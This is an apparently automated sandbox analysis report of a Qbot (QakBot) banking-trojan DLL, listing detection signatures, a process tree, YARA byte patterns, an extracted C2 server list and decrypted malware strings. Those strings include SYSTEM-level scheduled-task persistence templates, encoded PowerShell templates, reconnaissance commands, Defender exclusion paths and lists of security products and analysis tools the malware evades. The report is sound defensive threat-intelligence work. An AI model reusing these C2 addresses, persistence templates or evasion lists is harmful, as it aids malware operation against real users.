Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
distantly.dat.dll

Overview

General Information

Sample Name:distantly.dat.dll
Analysis ID:880549
MD5:5f1e08625d65bb93e8bf4611d2ee9070
SHA1:56fc9eb319ac902ac7e26357bd4cc598a3644d38
SHA256:7bfa0fc80cf1b4dc110356aad858ed3638985dce794286dfe9a25ff3869fed02
Tags:dll
Infos:

Detection

Qbot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Qbot
Sigma detected: Execute DLL with spoofed extension
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
Injects a PE file into a foreign processes
C2 URLs / IPs found in malware configuration
Sample uses string decryption to hide its real strings
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Connects to several IPs in different countries
PE file contains more sections than normal
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 5784 cmdline: loaddll32.exe "C:\Users\user\Desktop\distantly.dat.dll" MD5: 3B4636AE519868037940CA5C4272091B)
    • conhost.exe (PID: 5432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 7068 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\distantly.dat.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 3912 cmdline: rundll32.exe "C:\Users\user\Desktop\distantly.dat.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • WerFault.exe (PID: 1264 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3912 -s 672 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 7080 cmdline: rundll32.exe C:\Users\user\Desktop\distantly.dat.dll,lcopy_block_row MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 2404 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 1412 cmdline: rundll32.exe C:\Users\user\Desktop\distantly.dat.dll,lcopy_sample_rows MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7232 cmdline: rundll32.exe C:\Users\user\Desktop\distantly.dat.dll,ldiv_round_up MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7280 cmdline: rundll32.exe "C:\Users\user\Desktop\distantly.dat.dll",lcopy_block_row MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 7388 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7280 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 7288 cmdline: rundll32.exe "C:\Users\user\Desktop\distantly.dat.dll",lcopy_sample_rows MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7296 cmdline: rundll32.exe "C:\Users\user\Desktop\distantly.dat.dll",ldiv_round_up MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7308 cmdline: rundll32.exe "C:\Users\user\Desktop\distantly.dat.dll",next MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • wermgr.exe (PID: 7524 cmdline: C:\Windows\SysWOW64\wermgr.exe MD5: CCF15E662ED5CE77B5FF1A7AAE305233)
    • rundll32.exe (PID: 7328 cmdline: rundll32.exe "C:\Users\user\Desktop\distantly.dat.dll",lround_up MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7352 cmdline: rundll32.exe "C:\Users\user\Desktop\distantly.dat.dll",lpeg_write_tables MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 7428 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7352 -s 660 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
QakBot, qbotQbotQBot is a modular information stealer also known as Qakbot or Pinkslipbot. It has been active for years since 2007. It has historically been known as a banking Trojan, meaning that it steals financial data from infected systems, and a loader using C2 servers for payload targeting and download.
  • GOLD CABIN
https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot
{"Bot id": "BB30", "Campaign": "1685686808", "Version": "404.1346", "C2 list": ["86.173.2.12:2222", "92.9.45.20:2222", "100.4.163.158:2222", "213.64.33.92:2222", "75.98.154.19:443", "78.192.109.105:2222", "88.126.94.4:50000", "70.28.50.223:2083", "92.154.17.149:2222", "24.234.220.88:993", "87.252.106.39:995", "174.4.89.3:443", "12.172.173.82:20", "90.29.86.138:2222", "70.160.67.203:443", "223.166.13.95:995", "184.181.75.148:443", "95.45.50.93:2222", "201.143.215.69:443", "64.121.161.102:443", "2.82.8.80:443", "188.28.19.84:443", "81.101.185.146:443", "79.77.142.22:2222", "84.215.202.8:443", "183.87.163.165:443", "74.12.147.139:2078", "74.12.147.139:2222", "74.12.147.139:2222", "74.12.147.139:2083", "70.28.50.223:2078", "94.204.202.106:443", "87.221.153.182:2222", "70.28.50.223:2087", "24.234.220.88:990", "2.49.63.160:2222", "72.205.104.134:443", "199.27.66.213:443", "83.249.198.100:2222", "90.104.151.37:2222", "116.75.63.183:443", "70.28.50.223:2078", "117.195.17.148:993", "77.126.99.230:443", "45.62.70.33:443", "24.234.220.88:465", "203.109.44.236:995", "75.109.111.89:443", "161.142.103.187:995", "77.86.98.236:443", "147.147.30.126:2222", "124.246.122.199:2222", "103.123.223.133:443", "180.151.19.13:2078", "176.142.207.63:443", "12.172.173.82:32101", "103.140.174.20:2222", "70.50.83.216:2222", "12.172.173.82:465", "38.2.18.164:443", "93.187.148.45:995", "70.64.77.115:443", "12.172.173.82:21", "70.49.205.198:2222", "27.0.48.233:443", "12.172.173.82:50001", "83.110.223.61:443", "103.141.50.43:995", "85.101.239.116:443", "103.42.86.42:995", "92.1.170.110:995", "81.229.117.95:2222", "124.122.47.148:443", "103.212.19.254:995", "103.139.242.6:443", "125.99.76.102:443", "50.68.186.195:443", "47.205.25.170:443", "12.172.173.82:993", "12.172.173.82:22", "70.28.50.223:32100", "79.168.224.165:2222", "121.121.108.120:995", "69.160.121.6:61201", "200.84.211.255:2222", "201.244.108.183:995", "93.187.148.45:443", "85.61.165.153:2222", "184.182.66.109:443", "175.156.217.7:2222", "70.28.50.223:3389", "114.143.176.236:443", "65.95.141.84:2222", "80.6.50.34:443", "12.172.173.82:2087", "47.199.241.39:443", "66.241.183.99:443", "113.11.92.30:443", "186.75.95.6:443", "125.99.69.178:443", "109.130.247.84:2222", "96.56.197.26:2222", "70.50.1.252:2222", "91.160.70.68:32100", "67.70.120.249:2222", "209.171.160.69:995", "98.163.227.79:443", "176.133.4.230:995", "24.234.220.88:995", "45.62.75.250:443", "200.44.198.47:2222", "173.17.45.60:443", "5.192.141.228:2222", "184.63.133.131:995", "70.28.50.223:2083", "78.82.143.154:2222", "73.88.173.113:443", "181.4.225.225:443", "24.234.220.88:443", "174.58.146.57:443"]}
SourceRuleDescriptionAuthorStrings
00000010.00000002.576923753.0000000001090000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
    00000010.00000002.576802227.00000000006AA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
      decrypted.memstrJoeSecurity_QbotYara detected QbotJoe Security
        SourceRuleDescriptionAuthorStrings
        16.2.rundll32.exe.10000000.1.unpackMAL_QakBot_ConfigExtraction_Feb23QakBot Config Extractionkevoreilly
        • 0xec55:$params: 8B 7D 08 8B F1 57 89 55 FC E8 84 99 FF FF 8D 9E 24 04 00 00 89 03 59 85 C0 75 08 6A FC 58 E9
        • 0xa87b:$conf: 5F 5E 5B C9 C3 51 6A 00 E8 C1 44 00 00 59 59 85 C0 75 01 C3
        16.2.rundll32.exe.10000000.1.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
          16.2.rundll32.exe.6c0960.0.unpackMAL_QakBot_ConfigExtraction_Feb23QakBot Config Extractionkevoreilly
          • 0xe055:$params: 8B 7D 08 8B F1 57 89 55 FC E8 84 99 FF FF 8D 9E 24 04 00 00 89 03 59 85 C0 75 08 6A FC 58 E9
          • 0x9c7b:$conf: 5F 5E 5B C9 C3 51 6A 00 E8 C1 44 00 00 59 59 85 C0 75 01 C3
          16.2.rundll32.exe.6c0960.0.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
            16.2.rundll32.exe.6c0960.0.raw.unpackMAL_QakBot_ConfigExtraction_Feb23QakBot Config Extractionkevoreilly
            • 0xec55:$params: 8B 7D 08 8B F1 57 89 55 FC E8 84 99 FF FF 8D 9E 24 04 00 00 89 03 59 85 C0 75 08 6A FC 58 E9
            • 0xa87b:$conf: 5F 5E 5B C9 C3 51 6A 00 E8 C1 44 00 00 59 59 85 C0 75 01 C3
            Click to see the 1 entries

            Data Obfuscation

            barindex
            Source: Process startedAuthor: Joe Security: Data: Command: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\distantly.dat.dll",#1, CommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\distantly.dat.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: loaddll32.exe "C:\Users\user\Desktop\distantly.dat.dll", ParentImage: C:\Windows\System32\loaddll32.exe, ParentProcessId: 5784, ParentProcessName: loaddll32.exe, ProcessCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\distantly.dat.dll",#1, ProcessId: 7068, ProcessName: cmd.exe
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000010.00000002.576802227.00000000006AA000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Qbot {"Bot id": "BB30", "Campaign": "1685686808", "Version": "404.1346", "C2 list": ["86.173.2.12:2222", "92.9.45.20:2222", "100.4.163.158:2222", "213.64.33.92:2222", "75.98.154.19:443", "78.192.109.105:2222", "88.126.94.4:50000", "70.28.50.223:2083", "92.154.17.149:2222", "24.234.220.88:993", "87.252.106.39:995", "174.4.89.3:443", "12.172.173.82:20", "90.29.86.138:2222", "70.160.67.203:443", "223.166.13.95:995", "184.181.75.148:443", "95.45.50.93:2222", "201.143.215.69:443", "64.121.161.102:443", "2.82.8.80:443", "188.28.19.84:443", "81.101.185.146:443", "79.77.142.22:2222", "84.215.202.8:443", "183.87.163.165:443", "74.12.147.139:2078", "74.12.147.139:2222", "74.12.147.139:2222", "74.12.147.139:2083", "70.28.50.223:2078", "94.204.202.106:443", "87.221.153.182:2222", "70.28.50.223:2087", "24.234.220.88:990", "2.49.63.160:2222", "72.205.104.134:443", "199.27.66.213:443", "83.249.198.100:2222", "90.104.151.37:2222", "116.75.63.183:443", "70.28.50.223:2078", "117.195.17.148:993", "77.126.99.230:443", "45.62.70.33:443", "24.234.220.88:465", "203.109.44.236:995", "75.109.111.89:443", "161.142.103.187:995", "77.86.98.236:443", "147.147.30.126:2222", "124.246.122.199:2222", "103.123.223.133:443", "180.151.19.13:2078", "176.142.207.63:443", "12.172.173.82:32101", "103.140.174.20:2222", "70.50.83.216:2222", "12.172.173.82:465", "38.2.18.164:443", "93.187.148.45:995", "70.64.77.115:443", "12.172.173.82:21", "70.49.205.198:2222", "27.0.48.233:443", "12.172.173.82:50001", "83.110.223.61:443", "103.141.50.43:995", "85.101.239.116:443", "103.42.86.42:995", "92.1.170.110:995", "81.229.117.95:2222", "124.122.47.148:443", "103.212.19.254:995", "103.139.242.6:443", "125.99.76.102:443", "50.68.186.195:443", "47.205.25.170:443", "12.172.173.82:993", "12.172.173.82:22", "70.28.50.223:32100", "79.168.224.165:2222", "121.121.108.120:995", "69.160.121.6:61201", "200.84.211.255:2222", "201.244.108.183:995", "93.187.148.45:443", "85.61.165.153:2222", "184.182.66.109:443", "175.156.217.7:2222", "70.28.50.223:3389", "114.143.176.236:443", "65.95.141.84:2222", "80.6.50.34:443", "12.172.173.82:2087", "47.199.241.39:443", "66.241.183.99:443", "113.11.92.30:443", "186.75.95.6:443", "125.99.69.178:443", "109.130.247.84:2222", "96.56.197.26:2222", "70.50.1.252:2222", "91.160.70.68:32100", "67.70.120.249:2222", "209.171.160.69:995", "98.163.227.79:443", "176.133.4.230:995", "24.234.220.88:995", "45.62.75.250:443", "200.44.198.47:2222", "173.17.45.60:443", "5.192.141.228:2222", "184.63.133.131:995", "70.28.50.223:2083", "78.82.143.154:2222", "73.88.173.113:443", "181.4.225.225:443", "24.234.220.88:443", "174.58.146.57:443"]}
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: error res='%s' err=%d len=%u
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: netstat -nao
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: runas
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: ipconfig /all
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: net localgroup
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: nltest /domain_trusts /all_trusts
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %s %04x.%u %04x.%u res: %s seh_test: %u consts_test: %d vmdetected: %d createprocess: %d
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Microsoft
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: SELF_TEST_1
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: p%08x
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Self test FAILED!!!
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Self test OK.
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: /t5
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: whoami /all
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: cmd
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: microsoft.com,google.com,cisco.com,oracle.com,verisign.com,broadcom.com,yahoo.com,xfinity.com,irs.gov,linkedin.com
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: ERROR: GetModuleFileNameW() failed with error: ERROR_INSUFFICIENT_BUFFER
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: route print
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: .lnk
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: "%s\system32\schtasks.exe" /Create /ST %02u:%02u /RU "NT AUTHORITY\SYSTEM" /SC ONCE /tr "%s" /Z /ET %02u:%02u /tn %s
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: arp -a
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %s "$%s = \"%s\"; & $%s"
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: net share
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: cmd.exe /c set
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Self check
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %u;%u;%u;
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: /c ping.exe -n 6 127.0.0.1 & type "%s\System32\calc.exe" > "%s"
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: ProfileImagePath
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: at.exe %u:%u "%s" /I
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: ProgramData
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Self check ok!
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: powershell.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: qwinsta
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: net view
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.%s
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Component_08
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Start screenshot
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: schtasks.exe /Delete /F /TN %u
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: appidapi.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %s \"$%s = \\\"%s\\\\; & $%s\"
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: c:\ProgramData
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Component_07
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: bUdiuy81gYguty@4frdRdpfko(eKmudeuMncueaN
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: powershell.exe -encodedCommand %S
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: ERROR: GetModuleFileNameW() failed with error: %u
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: powershell.exe -encodedCommand
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: SoNuce]ugdiB3c[doMuce2s81*uXmcvP
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: \System32\WindowsPowerShell\v1.0\powershell.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: schtasks.exe /Create /RU "NT AUTHORITY\SYSTEM" /SC ONSTART /TN %u /TR "%s" /NP /F
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: error res='%s' err=%d len=%u
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: netstat -nao
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: runas
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: ipconfig /all
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %u.%u.%u.%u.%u.%u.%04x
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\SysWOW64\explorer.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: SystemRoot
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: cscript.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: MBAMService.exe;mbamgui.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\System32\xwizard.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\System32\wermgr.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: AvastSvc.exe;aswEngSrv.exe;aswToolsSvc.exe;afwServ.exe;aswidsagent.exe;AvastUI.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: C:\INTERNAL\__empty
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: .dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Win32_PhysicalMemory
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: ALLUSERSPROFILE
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: image/jpeg
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: LocalLow
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: displayName
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Mozilla/5.0 (Windows NT 6.1; rv:77.0) Gecko/20100101 Firefox/77.0
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: shlwapi.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\SysWOW64\WerFault.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: CommandLine
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: {%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: kernel32.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: SubmitSamplesConsent
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: 1234567890
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: wbj.go
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\SysWOW64\wextract.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Win32_DiskDrive
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: vkise.exe;isesrv.exe;cmdagent.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: System32
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Name
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\System32\WerFault.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: WRSA.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: c:\\
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: SpyNetReporting
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: FALSE
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: aswhookx.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Packages
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: SonicWallClientProtectionService.exe;SWDash.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: application/x-shockwave-flash
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Sophos UI.exe;SophosUI.exe;SAVAdminService.exe;SavService.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: RepUx.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\System32\mspaint.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Winsta0
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Caption,Description,DeviceID,Manufacturer,Name,PNPDeviceID,Service,Status
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: CynetEPS.exe;CynetMS.exe;CynetConsole.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\SysWOW64\wermgr.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %ProgramFiles(x86)%\Internet Explorer\iexplore.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: avp.exe;kavtray.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: root\SecurityCenter2
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\SysWOW64\backgroundTaskHost.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: MsMpEng.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\System32\CertEnrollCtrl.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: userenv.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: csc_ui.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: frida-winjector-helper-32.exe;frida-winjector-helper-64.exe;tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe;qak_proxy;dumpcap.exe;CFF Explorer.exe;not_rundll32.exe;ProcessHacker.exe;tcpview.exe;filemon.exe;procmon.exe;idaq64.exe;loaddll32.exe;PETools.exe;ImportREC.exe;LordPE.exe;SysInspector.exe;proc_analyzer.exe;sysAnalyzer.exe;sniff_hit.exe;joeboxcontrol.exe;joeboxserver.exe;ResourceHacker.exe;x64dbg.exe;Fiddler.exe;sniff_hit.exe;sysAnalyzer.exe;BehaviorDumper.exe;processdumperx64.exe;anti-virus.EXE;sysinfoX64.exe;sctoolswrapper.exe;sysinfoX64.exe;FakeExplorer.exe;apimonitor-x86.exe;idaq.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: \\.\pipe\
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: pstorec.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: NTUSER.DAT
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: from
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\System32\sethc.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: netapi32.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\System32\Utilman.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: gdi32.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: setupapi.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: SELECT * FROM Win32_Processor
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: iphlpapi.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Caption
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: CrAmTray.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: ccSvcHst.exe;NortonSecurity.exe;nsWscSvc.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Win32_ComputerSystem
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\System32\backgroundTaskHost.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %ProgramFiles%\Internet Explorer\iexplore.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: user32.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: xagtnotif.exe;AppUIMonitor.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\System32\dxdiag.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: SentinelServiceHost.exe;SentinelStaticEngine.exe;SentinelAgent.exe;SentinelStaticEngineScanner.exe;SentinelUI.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: \sf2.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\SysWOW64\grpconv.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: egui.exe;ekrn.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Software\Microsoft
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %S.%06d
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: bcrypt.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: SELECT * FROM AntiVirusProduct
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\SysWOW64\SndVol.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\explorer.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\SysWOW64\Utilman.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: SOFTWARE\Microsoft\Windows Defender\SpyNet
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: wtsapi32.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\SysWOW64\xwizard.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: shell32.dll
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: TRUE
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: Win32_Bios
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: SELECT * FROM Win32_OperatingSystem
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\SysWOW64\mobsync.exe
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: c:\hiberfil.sysss
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: */*
            Source: 16.2.rundll32.exe.10000000.1.unpackString decryptor: %SystemRoot%\SysWOW64\AtBroker.exe
